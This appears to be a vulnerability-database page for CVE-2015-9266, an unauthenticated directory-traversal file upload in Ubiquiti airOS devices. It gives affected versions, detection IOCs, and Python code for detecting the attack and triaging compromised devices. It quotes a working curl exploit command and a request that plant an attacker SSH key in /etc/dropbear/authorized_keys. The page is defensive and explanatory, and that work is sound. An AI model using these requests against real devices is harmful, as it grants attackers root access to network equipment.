CVE-2015-9266
Published 2018-09-05
Priority: P1 · Severity: critical · CVSS 3.0 base score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available · EPSS: 74.00% (99.4th percentile)
The web management interface of Ubiquiti airMAX, airFiber, airGateway and EdgeSwitch XP (formerly TOUGHSwitch) allows an unauthenticated attacker to upload and write arbitrary files using directory traversal techniques. An attacker can exploit this vulnerability to gain root privileges. This vulnerability is fixed in the following product versions (fixes released in July 2015, all prior versions are affected): airMAX AC 7.1.3; airMAX M (and airRouter) 5.6.2 XM/XW/TI, 5.5.11 XM/TI, and 5.5.10u2 XW; airGateway 1.1.5; airFiber AF24/AF24HD 2.2.1, AF5x 3.0.2.1, and AF5 2.2.1; airOS 4 XS2/XS5 4.0.4; and EdgeSwitch XP (formerly TOUGHSwitch) 1.3.2.
Affected (12 ranges)
| Vendor (CPE) | Product (CPE) | Version range | Fixed in |
|---|---|---|---|
| ubnt | airos_4_xs2 | < 4.0.4 | 4.0.4 |
| ubnt | airos_4_xs5 | < 4.0.4 | 4.0.4 |
| ubnt | edgeswitch_xp_firmware | < 1.3.2 | 1.3.2 |
| ui | af5_firmware | < 2.2.1 | 2.2.1 |
| ui | af5x_firmware | < 3.0.2.1 | 3.0.2.1 |
| ui | airfiber_af24_firmware | < 2.2.1 | 2.2.1 |
| ui | airfiber_af24hd_firmware | < 2.2.1 | 2.2.1 |
| ui | airgateway_firmware | < 1.1.5 | 1.1.5 |
| ui | airmax_ac_firmware | < 7.1.3 | 7.1.3 |
| ui | airmax_m_ti_firmware | < 5.6.2 | 5.6.2 |
| ui | airmax_m_xm_firmware | < 5.6.2 | 5.6.2 |
| ui | airmax_m_xw_firmware | < 5.6.2 | 5.6.2 |
Notes: "ubnt" and "ui" are both CPE vendor identifiers for Ubiquiti. The airGateway fixed version is 1.1.5 as stated in the advisory text (the indexed range read "1.15"), and the airMAX AC range, which the indexed data left blank, is taken from the advisory text. The advisory also names the airMAX M maintenance releases 5.5.11 (XM/TI) and 5.5.10u2 (XW) as fixed, so a device on a 5.5.x branch at or above those versions is patched even though it is below 5.6.2.
Detection & IOCs (extracted from sources)
Command (from the HackerOne report): curl -F "[email protected]/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k
(The local-file argument before /id_rsa.pub is mangled by the page's e-mail obfuscation. It is curl's field=@path form-upload syntax pointing at the attacker's SSH public key; ";filename=" overrides the Content-Disposition filename, which the device uses unchecked as the write path, and "-H Expect:" suppresses curl's default Expect: 100-continue header.)
- Detect unauthenticated multipart POST requests to /login.cgi whose Content-Disposition filename parameter contains directory traversal sequences (e.g. '../').
- Alert on HTTP POST requests to /login.cgi with a multipart filename field containing '../../etc/dropbear/authorized_keys' or '../../etc/passwd'; these are the targets written by the public exploit and the Metasploit module.
- Flag the User-Agent 'Jakarta Commons-HttpClient/3.1' in requests to Ubiquiti device management interfaces. It is the UA in the documented exploit request, but a client string is trivially changed, so treat it as low-confidence enrichment rather than a standalone indicator.
- Monitor for unexpected modification of /etc/passwd, /etc/dropbear/authorized_keys or /etc/persistent/rc.poststart on airOS devices; these are the files written by the exploit and by the 'mf' malware. rc.poststart under /etc/persistent runs at boot, which is how the malware persists across reboots.
- Correlate exploitation with subsequent SSH root logins: the attack chain writes an attacker-controlled public key to /etc/dropbear/authorized_keys, giving root SSH access without a password.
- The /login.cgi endpoint is reachable before authentication; no session or credentials are needed to trigger the upload. Upgrading is the fix; until then, restricting network access to the management interface (management VLAN, firewall rules, or disabling the web UI on untrusted interfaces) is the primary compensating control.
- All versions prior to the July 2015 fixes are affected across multiple product lines; patched versions are airMAX AC 7.1.3, airMAX M 5.6.2, airGateway 1.1.5, airFiber AF24/AF24HD 2.2.1, AF5x 3.0.2.1, AF5 2.2.1, airOS 4 XS2/XS5 4.0.4, and EdgeSwitch XP 1.3.2.
- The 'mf' malware exploited this vulnerability in the wild, persisting via /etc/persistent/rc.poststart; this is active exploitation, not merely opportunistic scanning. The Ubiquiti community "Virus attack URGENT" thread and the "Important Security Notice and airOS 5.6.5 Release" post in the references below date from that outbreak.
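The detection bullets above and the traversal mechanism in the description can be exercised offline. The following Python block is an added example, not code from the advisory, the HackerOne report, Exploit-DB or the Metasploit module: it builds two constructed requests modelled on the quoted exploit request (one uploading to a plain filename, one using the ../../etc/dropbear/authorized_keys traversal), parses the multipart body, shows the path a handler that trusts the Content-Disposition filename would open against an assumed staging directory (/var/tmp is a placeholder; the real airOS path is not given on the page), shows a confined resolver that rejects the same input, and runs the IOC-list rule over both requests. The boundary, host, User-Agent and key material are sample values, and the rule name airos-login-cgi-traversal-upload is invented for this example.

```python
import posixpath
import re

# Constructed sample traffic modelled on the request quoted in the Exploit-DB
# entry; boundary, host and key material are made up for this example.
BOUNDARY = "---------------------------72971515916103336881230390860"
FAKE_KEY = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfakekeymaterial"


def build_request(filename: str, content: str) -> bytes:
    """Assemble a raw HTTP/1.1 multipart upload with one file part."""
    body = (f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"file\"; "
            f"filename=\"{filename}\"\r\nContent-Type: application/octet-stream"
            f"\r\n\r\n{content}\r\n--{BOUNDARY}--\r\n").encode()
    head = (f"POST /login.cgi HTTP/1.1\r\nHost: 192.168.1.20\r\n"
            f"User-Agent: Jakarta Commons-HttpClient/3.1\r\n"
            f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode()
    return head + body


MALICIOUS = build_request("../../etc/dropbear/authorized_keys", FAKE_KEY + " attacker")
BENIGN = build_request("id_rsa.pub", FAKE_KEY + " operator")


def parse_request(raw: bytes) -> dict:
    """Split a raw request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def multipart_parts(content_type: str, body: bytes) -> list:
    """Return [{name, filename, data}] for each part of a multipart body."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return []
    delimiter = b"--" + m.group(1).encode()
    parts = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        # The CRLF after a delimiter and the CRLF before the next one belong
        # to the delimiter, not to the part body (RFC 2046 section 5.1.1).
        chunk = chunk[2:] if chunk.startswith(b"\r\n") else chunk
        chunk = chunk[:-2] if chunk.endswith(b"\r\n") else chunk
        part_head, _, data = chunk.partition(b"\r\n\r\n")
        disposition = ""
        for line in part_head.decode("latin-1").split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                disposition = line.partition(":")[2]
        name = re.search(r'(?<![A-Za-z])name="([^"]*)"', disposition)
        filename = re.search(r'filename="([^"]*)"', disposition)
        parts.append({"name": name.group(1) if name else None,
                      "filename": filename.group(1) if filename else None,
                      "data": data})
    return parts


# Assumed staging directory two levels below "/", so that the "../../" prefix
# used by the public exploit lands on "/". The real airOS path is not on the page.
UPLOAD_DIR = "/var/tmp"


def vulnerable_target(filename: str, upload_dir: str = UPLOAD_DIR) -> str:
    """Path opened by a handler that joins the client filename verbatim."""
    return posixpath.normpath(posixpath.join(upload_dir, filename))


def confined_target(filename: str, upload_dir: str = UPLOAD_DIR) -> str:
    """Hardened form: reject separators and '..', then re-check containment."""
    if not filename or "/" in filename or "\\" in filename or ".." in filename:
        raise ValueError(f"rejected upload name: {filename!r}")
    target = posixpath.normpath(posixpath.join(upload_dir, filename))
    if posixpath.commonpath([upload_dir, target]) != upload_dir:
        raise ValueError(f"upload escapes {upload_dir}: {target}")
    return target


TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def detect(raw: bytes) -> list:
    """IOC-list rule: multipart POST to /login.cgi whose Content-Disposition
    filename traverses or is absolute. The endpoint is pre-auth, so the
    presence or absence of a session cookie is deliberately not a condition."""
    req = parse_request(raw)
    if req["method"] != "POST" or req["path"].split("?")[0] != "/login.cgi":
        return []
    ctype = req["headers"].get("content-type", "")
    if not ctype.lower().startswith("multipart/form-data"):
        return []
    ua = req["headers"].get("user-agent", "")
    findings = []
    for part in multipart_parts(ctype, req["body"]):
        fn = part["filename"]
        if fn and (TRAVERSAL.search(fn) or fn.startswith("/")):
            findings.append({"rule": "airos-login-cgi-traversal-upload",
                             "filename": fn,
                             "would_write": vulnerable_target(fn),
                             # Enrichment only: a UA is trivially changed.
                             "ua_match": ua.startswith("Jakarta Commons-HttpClient")})
    return findings
```

Calling detect() on the two constructed requests yields nothing for the plain upload and one finding for the traversal request, with would_write resolved to /etc/dropbear/authorized_keys; confined_target() raises on the same filename. The ua_match field is carried as enrichment rather than used as a condition, for the reason given in the IOC list.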
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 10.0 | HIGH | AV:N/AC:L/Au:N/C:C/I:C/A:C |
(CVSS 2.0 has no "critical" band; 10.0 is rated HIGH under the v2 scale.)
No detection rules found.
Exploit-DB
AirOS 6.x - Arbitrary File Upload (exploitdb, 2016-04-15)
---
EDB-Note Source: https://hackerone.com/reports/73480
Vulnerability
It's possible to overwrite any file (and create new ones) on AirMax systems, because the "php2" (maybe because of a patch) doesn't verify the "filename" value of a POST request. It's possible for an unauthenticated user to exploit this vulnerability.
Example
Consider the following request:
POST https://192.168.1.20/login.cgi HTTP/1.1
Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
Content-Length: 773
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.1.20
Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/
Metasploit
Ubiquiti airOS Arbitrary File Upload (metasploit)
This module exploits a pre-auth file upload to install a new root user to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys. FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten. /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true. This method is used by the "mf" malware infecting these devices.
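The module description lists the three files that both it and the 'mf' malware overwrite. The following Python block is an added example, not part of the Metasploit module or of any Ubiquiti tooling: it triages copies of /etc/passwd, /etc/dropbear/authorized_keys and /etc/persistent/rc.poststart pulled from a suspect device, flagging UID-0 accounts beyond the expected admin users, SSH keys whose type-plus-blob is not on an operator allow-list, and any command present in rc.poststart. The file contents, the svc account, the key material and the /etc/persistent/.keys path are constructed for the example. Two assumptions are built in and should be checked against a known-good device of the same model and firmware: that only root and the admin user (default name ubnt) carry UID 0 on airOS, and that rc.poststart is absent or empty unless an operator customised it.

```python
# Constructed file contents standing in for copies pulled from a device. The
# 'svc' account, the hash and the key material are fabricated for this example.
PASSWD = """root:x:0:0:root:/root:/bin/sh
ubnt:x:0:0:Administrator:/etc/persistent:/bin/sh
svc:$1$fakesalt$fakehashfakehashfakeha:0:0:svc:/:/bin/sh
nobody:x:65534:65534:nobody:/:/bin/false
"""
AUTHORIZED_KEYS = """ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDoperatorkeyfake ops@nms
# operator comment line
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDattackerkeyfake attacker
"""
RC_POSTSTART = """#!/bin/sh
# constructed sample: re-installs a key at boot, the pattern the module's
# PERSIST_ETC option and the 'mf' malware use; not the real script
cat /etc/persistent/.keys >> /etc/dropbear/authorized_keys
"""

# Accounts that legitimately carry UID 0 on airOS: root and the configured
# admin user (default name 'ubnt'). Assumption; adjust to the device in hand.
EXPECTED_UID0 = {"root", "ubnt"}
# Type + base64 blob of every key the operator provisioned. Assumption.
KNOWN_KEY_BLOBS = {"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDoperatorkeyfake"}
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def rogue_uid0_accounts(passwd_text, expected=EXPECTED_UID0):
    """Names of UID-0 entries that are not the expected admin accounts."""
    rogue = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0" and fields[0] not in expected:
            rogue.append(fields[0])
    return rogue


def unknown_keys(authorized_keys_text, known_blobs=KNOWN_KEY_BLOBS):
    """Key lines whose type+blob is not allow-listed. Matching on the blob
    rather than the trailing comment matters: the comment is attacker-chosen
    and can be made to look like an operator's key."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        # Skip any leading options (e.g. command="...") to find the key type.
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        blob = fields[idx] + " " + fields[idx + 1]
        if blob not in known_blobs:
            unknown.append({"type": fields[idx], "comment": " ".join(fields[idx + 2:])})
    return unknown


def poststart_commands(text):
    """Non-comment lines in rc.poststart. Assumption: on a device that was
    never customised the file is absent or empty, so any command is notable."""
    return [l.strip() for l in text.splitlines()
            if l.strip() and not l.lstrip().startswith("#")]


def triage(passwd, authorized_keys, rc_poststart, known_blobs=KNOWN_KEY_BLOBS):
    """Combine the three checks into one verdict for the pulled files."""
    report = {
        "rogue_uid0": rogue_uid0_accounts(passwd),
        "unknown_keys": unknown_keys(authorized_keys, known_blobs),
        "poststart": poststart_commands(rc_poststart),
    }
    report["compromised"] = any(report.values())
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(triage(PASSWD, AUTHORIZED_KEYS, RC_POSTSTART), indent=2))
```

On the constructed input, triage() reports the svc account, the second key (comment "attacker") and the single rc.poststart command, and marks the device compromised; the same functions applied to a clean passwd file and empty key and poststart files return an all-clear. Keys are compared on their type and base64 blob, so an attacker re-using an operator's comment string gains nothing.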
No writeups or analysis indexed.
References
- https://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/td-p/1562940
- https://community.ubnt.com/t5/airMAX-Updates-Blog/Important-Security-Notice-and-airOS-5-6-5-Release/ba-p/1565949
- https://community.ubnt.com/t5/airMAX-Updates-Blog/Security-Release-for-airMAX-TOUGHSwitch-and-airGateway-Released/ba-p/1300494
- https://hackerone.com/reports/73480
- https://www.exploit-db.com/exploits/39701/
- https://www.exploit-db.com/exploits/39853/
- https://www.rapid7.com/db/modules/exploit/linux/ssh/ubiquiti_airos_file_upload